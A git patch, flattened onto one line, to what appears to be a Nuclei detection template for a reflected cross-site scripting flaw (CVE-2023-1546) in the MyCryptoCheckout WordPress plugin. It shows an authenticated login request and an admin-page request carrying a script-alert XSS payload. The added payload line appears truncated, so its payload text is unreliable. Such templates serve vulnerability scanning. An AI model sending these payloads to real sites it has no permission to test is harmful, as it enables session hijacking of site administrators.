From ea472731daa19bbf7fc57b448da45da152c9ce86 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 16 Jul 2023 22:58:45 +0530 Subject: [PATCH] updated payload,matcher,info --- http/cves/2023/CVE-2023-1546.yaml | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index f8345d5a2b..5b07aa2651 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -1,16 +1,20 @@ id: CVE-2023-1546 info: - name: MyCryptoCheckout < 2.124 - Reflected XSS + name: MyCryptoCheckout < 2.124 - Cross-Site Scripting author: Harsh severity: medium description: | The plugin does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting reference: - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0 + - https://nvd.nist.gov/vuln/detail/CVE-2023-1546 classification: cve-id: CVE-2023-1546 - tags: wpscan,cve2023,wordpress,authenticated,cve,wp-plugin,xss + metadata: + max-request: 2 + verified: true + tags: cve,cve2023,Wordpress,wp,wp-plugin,xss,wpscan,authenticated http: - raw: @@ -20,12 +24,11 @@ http: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In + - | - GET /wp-admin/options-general.php?page=mycryptocheckout&%22%3E%3Cscript%3Ealert(007)%3C/script%3E HTTP/1.1 + GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"> HTTP/1.1 Host: {{Hostname}} - - cookie-reuse: true req-condition: true matchers: @@ -33,5 +36,6 @@ http: dsl: - 'status_code_2 == 200' - 'contains(header_2, "text/html")' - - 'contains(body_2, "scriptalert(007)")' + - 'contains(body_2, "scriptalert(/XSS/)/script")' + - 'contains(body_2, "mycryptocheckout")' condition: and